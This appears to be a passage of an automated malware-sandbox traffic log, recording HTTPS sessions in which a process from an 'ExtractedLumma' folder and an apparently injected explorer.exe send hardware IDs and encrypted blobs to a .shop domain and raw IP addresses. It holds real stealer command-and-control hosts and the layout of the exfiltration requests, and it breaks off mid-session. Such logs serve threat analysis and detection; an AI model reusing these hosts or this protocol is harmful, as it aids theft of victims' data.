                                                                                    2024-07-24 17:57:26 UTC1267OUTData Raw: 65 73 59 34 74 77 52 4a 6b 42 51 4c 32 65 35 38 6d 75 64 4a 38 36 5a 79 4f 6a 45 45 35 43 5a 49 2f 50 6f 2f 48 6b 6e 4b 47 62 50 47 7a 65 44 57 61 4d 66 36 6f 6f 6d 73 77 30 6d 30 34 59 66 53 57 4d 6f 7a 54 36 42 74 54 7a 54 47 49 6f 66 35 41 34 58 65 6f 70 6f 4b 49 6d 2b 37 6a 74 34 7a 70 68 51 46 76 33 31 32 6e 73 48 68 7a 2f 7a 32 48 41 47 69 50 64 52 6f 38 67 61 44 55 75 58 33 50 66 31 56 62 6f 51 6d 74 4d 49 2f 50 47 44 79 36 4f 77 33 56 78 72 73 6c 70 4a 47 63 69 62 67 37 75 4f 74 79 50 69 44 50 6b 7a 74 72 67 34 4d 57 71 31 49 71 50 44 51 48 46 55 61 41 47 65 66 4a 51 41 71 69 34 43 73 2b 76 6b 35 78 51 4a 72 7a 49 4a 72 71 6d 78 34 71 33 6f 30 34 55 48 4b 41 71 59 59 42 38 44 2f 62 62 30 42 6f 4a 74 34 6d 6e 6b 6d 2b 6f 79 76 49 46 75 78 51 33 2f
                                                                                    Data Ascii: esY4twRJkBQL2e58mudJ86ZyOjEE5CZI/Po/HknKGbPGzeDWaMf6oomsw0m04YfSWMozT6BtTzTGIof5A4XeopoKIm+7jt4zphQFv312nsHhz/z2HAGiPdRo8gaDUuX3Pf1VboQmtMI/PGDy6Ow3VxrslpJGcibg7uOtyPiDPkztrg4MWq1IqPDQHFUaAGefJQAqi4Cs+vk5xQJrzIJrqmx4q3o04UHKAqYYB8D/bb0BoJt4mnkm+oyvIFuxQ3/
                                                                                    2024-07-24 17:57:27 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:27 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:27 UTC685INData Raw: 66 33 44 2b 53 63 2f 41 6f 34 41 77 4c 38 59 57 47 58 6c 33 4d 79 77 6c 69 4f 2b 42 48 30 57 2f 2b 6e 69 76 73 7a 74 5a 4a 2f 6f 55 33 6c 61 4d 44 53 41 61 49 6a 39 6f 47 30 42 54 79 67 63 52 4c 70 72 78 67 50 77 77 38 43 71 65 57 50 4d 46 38 61 66 6d 49 63 50 47 65 79 4d 74 48 53 50 47 76 46 2b 55 64 36 42 73 54 55 4a 4c 2b 6a 53 73 6e 33 46 49 34 71 76 33 34 46 44 61 31 77 46 56 66 44 38 32 53 45 33 65 34 43 76 66 4c 6c 6b 30 48 39 65 62 56 49 51 75 4d 75 4a 61 58 4e 64 59 59 45 41 5a 4d 6d 43 6f 68 36 52 31 65 6d 58 4b 64 35 59 34 4c 75 74 45 42 4d 50 54 73 56 30 32 43 4d 4f 77 68 33 6f 71 78 35 79 50 35 48 6c 4b 45 46 6b 5a 64 2b 4d 7a 54 6b 7a 30 41 32 46 66 31 5a 49 38 51 4c 78 65 30 76 67 4f 4f 46 36 78 66 41 71 42 61 39 6e 69 43 56 56 36 6d 64 33
                                                                                    Data Ascii: f3D+Sc/Ao4AwL8YWGXl3MywliO+BH0W/+nivsztZJ/oU3laMDSAaIj9oG0BTygcRLprxgPww8CqeWPMF8afmIcPGeyMtHSPGvF+Ud6BsTUJL+jSsn3FI4qv34FDa1wFVfD82SE3e4CvfLlk0H9ebVIQuMuJaXNdYYEAZMmCoh6R1emXKd5Y4LutEBMPTsV02CMOwh3oqx5yP5HlKEFkZd+MzTkz0A2Ff1ZI8QLxe0vgOOF6xfAqBa9niCVV6md3


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    43192.168.2.1049790172.67.213.854437864C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:26 UTC287OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 20431
                                                                                    Host: liernessfornicsa.shop
                                                                                    2024-07-24 17:57:26 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62
                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
                                                                                    2024-07-24 17:57:26 UTC5100OUTData Raw: 00 60 83 eb 8b 82 f9 0d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00
                                                                                    Data Ascii: `?lpQ0/74G6(~`~O
                                                                                    2024-07-24 17:57:27 UTC808INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=iakh73pguuf4qchi8060gcdj74; expires=Sun, 17-Nov-2024 11:44:05 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cAcjTYbDQavkkcBb5R8Y%2F5y3khvXWZXrIPwnS5%2Fl6Do%2BEyj0efGZlKCI2GKkz7AcUY7hOc0kZigaX3KVCP1VSDis3j9vQnv4QzsIuL8VQDw0XO4n6DLSMjIE2AulXpMuvfkA%2FLEmUmE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85cae94fe30c9c-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:57:27 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                                    Data Ascii: eok 8.46.123.33
                                                                                    2024-07-24 17:57:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    44192.168.2.1049791107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:28 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:28 UTC1122OUTData Raw: 5a 47 63 32 43 2f 77 32 51 33 35 4a 74 34 32 44 58 32 79 36 51 70 6c 51 76 2b 54 5a 61 46 77 6b 59 4b 68 6b 31 75 76 44 33 36 57 39 76 56 4f 72 6a 6c 49 58 30 68 59 33 79 62 44 42 52 34 68 6b 58 6d 56 54 50 61 57 30 54 39 47 4c 33 7a 6c 68 35 6b 61 33 57 79 6a 6e 6e 73 73 6c 74 37 44 71 4e 4a 37 56 5a 54 52 73 44 79 7a 4b 53 79 6e 68 6a 58 36 66 79 71 72 46 62 62 71 46 7a 54 34 46 35 64 4c 43 2b 50 6d 70 38 54 37 32 77 61 38 46 38 77 68 63 54 65 69 48 2b 7a 34 4f 76 64 61 2f 43 58 4b 49 77 36 46 57 53 4f 70 35 51 75 71 37 55 31 45 45 47 48 4f 76 44 4c 4c 4a 75 56 75 64 51 69 41 72 33 4d 69 36 34 56 78 4b 55 2b 72 2f 58 44 68 58 38 4f 63 34 69 51 32 48 74 45 38 34 42 35 61 49 32 2b 6b 31 4f 35 65 76 38 46 57 4c 33 57 47 34 58 43 54 6a 67 61 41 34 41 72 59
                                                                                    Data Ascii: ZGc2C/w2Q35Jt42DX2y6QplQv+TZaFwkYKhk1uvD36W9vVOrjlIX0hY3ybDBR4hkXmVTPaW0T9GL3zlh5ka3Wyjnnsslt7DqNJ7VZTRsDyzKSynhjX6fyqrFbbqFzT4F5dLC+Pmp8T72wa8F8whcTeiH+z4Ovda/CXKIw6FWSOp5Quq7U1EEGHOvDLLJuVudQiAr3Mi64VxKU+r/XDhX8Oc4iQ2HtE84B5aI2+k1O5ev8FWL3WG4XCTjgaA4ArY
                                                                                    2024-07-24 17:57:29 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:29 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:29 UTC685INData Raw: 64 51 61 52 75 72 65 63 67 5a 54 76 34 41 66 63 35 36 4b 79 4b 75 67 58 5a 75 43 68 58 61 5a 69 62 34 32 43 71 55 31 73 78 56 4a 6f 65 47 66 32 4d 75 38 6f 72 34 55 4b 52 4b 31 6a 4c 58 63 4d 4f 6e 56 56 6f 6c 73 33 33 44 6f 30 2b 49 45 69 71 6a 59 69 33 53 30 68 49 77 67 59 6a 58 51 78 37 67 58 79 74 61 6a 61 6d 57 4e 64 37 75 52 71 4b 31 4d 6e 67 4c 33 6b 6a 4f 76 56 61 32 62 44 51 37 57 48 62 6f 44 6e 59 43 47 6c 4f 70 49 5a 67 54 6e 31 6c 53 45 4f 58 58 33 69 62 61 51 79 61 67 4b 2b 64 54 6c 56 58 35 66 34 79 78 57 77 67 37 76 76 43 78 49 4c 51 64 79 77 6c 4c 61 57 73 78 68 68 6c 58 70 2f 38 39 54 67 78 63 78 77 39 77 75 78 35 48 2b 4e 78 48 4d 68 4a 6f 6b 53 36 5a 76 59 67 38 68 79 62 2b 39 37 76 44 59 53 61 53 4c 58 73 33 56 49 59 51 45 2b 37 44 77
                                                                                    Data Ascii: dQaRurecgZTv4Afc56KyKugXZuChXaZib42CqU1sxVJoeGf2Mu8or4UKRK1jLXcMOnVVols33Do0+IEiqjYi3S0hIwgYjXQx7gXytajamWNd7uRqK1MngL3kjOvVa2bDQ7WHboDnYCGlOpIZgTn1lSEOXX3ibaQyagK+dTlVX5f4yxWwg7vvCxILQdywlLaWsxhhlXp/89Tgxcxw9wux5H+NxHMhJokS6ZvYg8hyb+97vDYSaSLXs3VIYQE+7Dw


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.2.1049792167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:30 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:30 UTC1122OUTData Raw: 55 52 44 4d 41 30 78 71 75 33 64 4b 4e 6b 65 75 51 66 35 73 5a 37 30 53 37 37 74 31 58 68 77 2b 36 64 6b 63 5a 68 35 37 54 74 4e 6b 48 62 35 52 32 51 65 6e 76 6d 66 33 78 4d 65 35 75 63 66 55 6f 45 49 69 6d 48 57 42 59 43 33 6e 4b 4b 54 47 65 49 74 33 5a 71 77 74 2f 55 43 4b 47 4f 38 2f 2b 6d 41 50 45 61 4e 50 2f 61 6f 71 69 79 64 54 67 6d 55 51 30 30 6d 45 4c 7a 79 31 69 69 38 51 77 49 71 65 37 47 47 37 43 46 38 4c 4b 66 43 56 6d 37 63 2f 69 43 61 4f 71 63 47 6d 6b 61 6b 52 4c 63 52 33 49 35 6a 43 2b 66 71 45 37 2b 79 55 70 76 4f 45 62 43 44 6e 4b 56 34 4f 64 63 76 7a 6d 7a 31 41 47 43 31 41 66 53 61 49 4d 6d 6a 6d 62 56 4b 4b 74 4d 76 79 4a 49 35 61 79 46 6f 4f 43 47 43 78 33 6c 6d 48 56 55 67 2b 4c 4f 35 65 73 54 58 65 51 6c 37 34 45 79 50 68 4d 56 58
                                                                                    Data Ascii: URDMA0xqu3dKNkeuQf5sZ70S77t1Xhw+6dkcZh57TtNkHb5R2Qenvmf3xMe5ucfUoEIimHWBYC3nKKTGeIt3Zqwt/UCKGO8/+mAPEaNP/aoqiydTgmUQ00mELzy1ii8QwIqe7GG7CF8LKfCVm7c/iCaOqcGmkakRLcR3I5jC+fqE7+yUpvOEbCDnKV4Odcvzmz1AGC1AfSaIMmjmbVKKtMvyJI5ayFoOCGCx3lmHVUg+LO5esTXeQl74EyPhMVX
                                                                                    2024-07-24 17:57:31 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:31 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:31 UTC685INData Raw: 46 37 77 71 47 32 61 4c 77 39 57 48 32 41 7a 2b 71 44 54 75 67 69 77 4e 47 4e 63 4e 4c 62 61 32 50 39 79 44 4b 6a 38 39 36 6b 4b 6b 55 5a 69 30 76 4e 76 42 56 41 49 4a 51 67 48 50 37 35 50 69 55 79 48 54 76 65 36 4c 59 6c 48 7a 6d 53 42 6c 6b 38 43 79 75 64 4e 71 54 4c 44 55 34 37 58 75 53 74 70 68 42 69 79 38 32 30 4f 6c 48 31 4f 59 64 5a 77 6f 5a 48 61 33 70 37 2f 69 36 6d 77 31 35 41 61 7a 63 47 4b 77 4e 32 6d 47 42 52 68 77 62 46 4a 68 59 6f 46 70 62 7a 54 30 39 43 4b 2b 67 62 6d 36 30 48 4c 54 66 2f 68 5a 62 4f 4a 69 4b 47 42 6e 63 7a 59 7a 57 4f 34 43 57 6e 6f 65 42 38 31 61 65 75 59 4c 35 65 4e 36 43 68 4b 6f 44 72 44 64 42 6f 37 54 4f 33 6c 61 69 79 67 50 76 71 4b 73 68 6f 6b 71 74 30 5a 32 75 6f 61 75 62 6b 66 46 47 31 6b 42 51 32 67 59 6a 32 68
                                                                                    Data Ascii: F7wqG2aLw9WH2Az+qDTugiwNGNcNLba2P9yDKj896kKkUZi0vNvBVAIJQgHP75PiUyHTve6LYlHzmSBlk8CyudNqTLDU47XuStphBiy820OlH1OYdZwoZHa3p7/i6mw15AazcGKwN2mGBRhwbFJhYoFpbzT09CK+gbm60HLTf/hZbOJiKGBnczYzWO4CWnoeB81aeuYL5eN6ChKoDrDdBo7TO3laiygPvqKshokqt0Z2uoaubkfFG1kBQ2gYj2h


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    46192.168.2.1049793172.67.213.854437864C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:31 UTC286OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 1232
                                                                                    Host: liernessfornicsa.shop
                                                                                    2024-07-24 17:57:31 UTC1232OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62
                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
                                                                                    2024-07-24 17:57:32 UTC810INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=abmrtq6mhsa5uasap115f3dmof; expires=Sun, 17-Nov-2024 11:44:10 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCLAFsLjKLF%2BGvHBwUiRxXs8JD1%2FmW%2BmzUtsbZ0xkdJPm9hzYatSVZ7sFCqqZ0eMJhJ5jLapoDjfoP2RM9%2Ft4ZKbsQQpN3%2F8QELUUGVC7cNtqKmtBSJit2AIGvOzCekyjNCWOfrER9k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85cb06fdfa4303-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:57:32 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                                    Data Ascii: eok 8.46.123.33
                                                                                    2024-07-24 17:57:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    47192.168.2.1049794107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:32 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:32 UTC1122OUTData Raw: 4f 4a 71 43 76 45 79 41 56 77 4a 72 73 77 71 47 48 47 56 72 30 68 64 59 4e 2f 33 78 4a 5a 31 6a 5a 49 75 54 46 4c 78 34 34 45 62 77 66 7a 6f 6c 4e 61 38 2b 6e 63 4a 6f 52 76 6d 37 7a 57 35 75 46 34 54 69 59 33 79 46 32 4a 61 4c 78 30 56 4c 64 4d 34 6f 72 44 63 73 62 48 71 4d 2b 38 32 67 54 31 44 75 76 39 68 6a 43 30 7a 53 50 6c 61 4c 31 5a 65 58 74 6a 2f 6f 49 36 54 6a 55 64 71 78 72 30 39 73 33 42 66 50 53 73 30 76 54 48 79 64 79 55 4f 69 42 31 54 62 39 65 44 52 44 6f 69 6d 43 71 51 36 65 50 6b 42 56 33 72 41 6b 2b 78 30 77 71 58 61 4d 6a 56 71 30 42 66 61 49 45 36 67 52 62 6e 32 39 66 6e 44 56 4e 47 67 46 33 37 4b 51 2b 35 7a 66 67 69 72 77 43 51 4c 4f 37 61 6c 33 6c 6e 45 66 78 6f 54 6a 6f 65 4c 50 30 4b 30 6a 33 53 6e 4f 6e 64 4d 33 41 4c 63 75 50 33
                                                                                    Data Ascii: OJqCvEyAVwJrswqGHGVr0hdYN/3xJZ1jZIuTFLx44EbwfzolNa8+ncJoRvm7zW5uF4TiY3yF2JaLx0VLdM4orDcsbHqM+82gT1Duv9hjC0zSPlaL1ZeXtj/oI6TjUdqxr09s3BfPSs0vTHydyUOiB1Tb9eDRDoimCqQ6ePkBV3rAk+x0wqXaMjVq0BfaIE6gRbn29fnDVNGgF37KQ+5zfgirwCQLO7al3lnEfxoTjoeLP0K0j3SnOndM3ALcuP3
                                                                                    2024-07-24 17:57:33 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:33 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:33 UTC685INData Raw: 66 6d 4b 41 48 72 66 33 48 5a 53 34 63 74 68 69 32 42 59 4e 5a 58 76 35 69 76 30 6d 73 46 55 69 7a 73 36 39 6b 4c 67 78 59 62 5a 71 37 6e 4d 42 44 56 5a 69 39 64 59 4a 49 77 4c 74 33 39 6b 6a 35 51 42 36 6e 30 45 48 4f 72 68 7a 7a 46 58 4c 4a 41 59 46 78 6f 5a 4f 42 4c 63 4c 74 39 63 73 34 73 33 34 4f 4b 42 31 4e 4b 48 4c 2b 79 41 66 50 54 37 55 67 2f 48 58 76 50 36 54 49 54 6f 36 34 67 48 35 46 55 45 73 65 4e 42 66 75 38 46 36 69 68 4b 65 68 4d 2f 34 34 7a 71 75 6e 76 6b 34 51 32 71 4c 65 50 74 54 45 6d 59 54 59 78 57 6d 56 32 4c 58 73 42 63 55 4d 31 43 31 67 2b 49 50 46 57 4a 55 35 66 42 41 67 70 33 69 54 5a 4f 66 72 42 4f 69 4b 71 33 4e 79 46 56 66 4e 42 2f 51 47 49 53 49 55 6f 41 75 4f 46 79 49 64 63 4c 6a 5a 38 36 62 35 44 37 2f 33 30 6f 55 4c 30 32
                                                                                    Data Ascii: fmKAHrf3HZS4cthi2BYNZXv5iv0msFUizs69kLgxYbZq7nMBDVZi9dYJIwLt39kj5QB6n0EHOrhzzFXLJAYFxoZOBLcLt9cs4s34OKB1NKHL+yAfPT7Ug/HXvP6TITo64gH5FUEseNBfu8F6ihKehM/44zqunvk4Q2qLePtTEmYTYxWmV2LXsBcUM1C1g+IPFWJU5fBAgp3iTZOfrBOiKq3NyFVfNB/QGISIUoAuOFyIdcLjZ86b5D7/30oUL02


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    48192.168.2.1049795107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:34 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:34 UTC1122OUTData Raw: 56 4a 4a 78 51 67 39 55 50 37 2b 6c 4f 31 6f 6b 6c 71 71 58 66 59 4b 58 58 59 32 68 39 4c 68 57 6e 47 59 5a 36 53 4e 37 67 41 53 67 77 76 52 46 79 78 78 4b 57 37 4e 4b 36 43 2b 2b 74 47 75 6f 4b 72 39 67 69 68 69 58 45 4e 58 55 68 56 74 48 74 37 64 33 77 6e 6b 45 62 52 67 43 4f 68 6b 76 70 70 77 39 5a 71 4e 4d 6f 56 32 4f 62 54 42 52 79 79 2b 67 78 41 69 46 48 34 7a 69 48 6b 69 38 6c 36 38 73 73 68 56 71 74 53 77 47 56 34 57 6b 32 78 6f 6f 49 61 53 6d 51 72 2b 2b 65 79 31 54 45 64 47 6f 6b 6a 63 7a 43 55 32 72 65 2f 5a 51 30 56 68 71 39 6c 78 56 4d 43 42 47 66 48 47 41 6a 64 6b 76 58 4c 4f 32 46 6c 6c 51 55 2f 38 65 47 51 64 79 31 4a 75 59 78 30 4a 6d 6e 5a 2f 58 76 42 79 77 38 61 35 72 35 2f 57 70 63 46 42 72 69 36 31 39 39 33 4f 72 35 63 48 6e 31 47 73
                                                                                    Data Ascii: VJJxQg9UP7+lO1oklqqXfYKXXY2h9LhWnGYZ6SN7gASgwvRFyxxKW7NK6C++tGuoKr9gihiXENXUhVtHt7d3wnkEbRgCOhkvppw9ZqNMoV2ObTBRyy+gxAiFH4ziHki8l68sshVqtSwGV4Wk2xooIaSmQr++ey1TEdGokjczCU2re/ZQ0Vhq9lxVMCBGfHGAjdkvXLO2FllQU/8eGQdy1JuYx0JmnZ/XvByw8a5r5/WpcFBri61993Or5cHn1Gs
                                                                                    2024-07-24 17:57:35 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:35 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:35 UTC685INData Raw: 68 30 48 70 33 36 49 4a 2f 36 57 37 75 6a 69 45 35 32 51 72 52 52 4a 6c 6f 57 53 62 6e 46 4d 69 75 59 71 69 52 39 65 6b 35 55 45 30 67 58 36 63 66 6a 57 6e 62 72 45 43 48 79 6a 67 45 57 68 6b 35 63 7a 64 62 74 78 38 48 51 47 2b 4a 4d 6d 66 31 44 4a 6b 2b 4f 67 45 58 45 6e 57 6e 73 42 73 72 6d 45 43 42 6d 57 34 33 6a 47 54 7a 57 39 45 4b 78 4a 7a 6a 73 69 2b 75 54 71 45 77 51 55 42 43 4b 42 75 6c 36 30 39 51 33 75 72 2f 49 32 58 78 45 47 54 54 38 68 6c 70 33 32 43 38 51 66 68 62 74 32 2f 69 72 67 62 76 54 42 37 7a 69 47 34 36 6f 30 74 70 63 4b 37 2b 32 4a 70 44 42 41 77 35 54 77 42 53 6c 4f 56 71 4f 4d 68 53 4a 4a 41 74 37 36 47 74 46 2f 4d 75 54 56 78 31 69 44 77 6f 68 7a 78 34 58 44 49 59 31 41 6b 44 6b 44 76 72 2b 51 2b 2b 4e 2b 64 4e 4f 62 66 5a 47 34
                                                                                    Data Ascii: h0Hp36IJ/6W7ujiE52QrRRJloWSbnFMiuYqiR9ek5UE0gX6cfjWnbrECHyjgEWhk5czdbtx8HQG+JMmf1DJk+OgEXEnWnsBsrmECBmW43jGTzW9EKxJzjsi+uTqEwQUBCKBul609Q3ur/I2XxEGTT8hlp32C8Qfhbt2/irgbvTB7ziG46o0tpcK7+2JpDBAw5TwBSlOVqOMhSJJAt76GtF/MuTVx1iDwohzx4XDIY1AkDkDvr+Q++N+dNObfZG4


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    49192.168.2.1049796167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:36 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
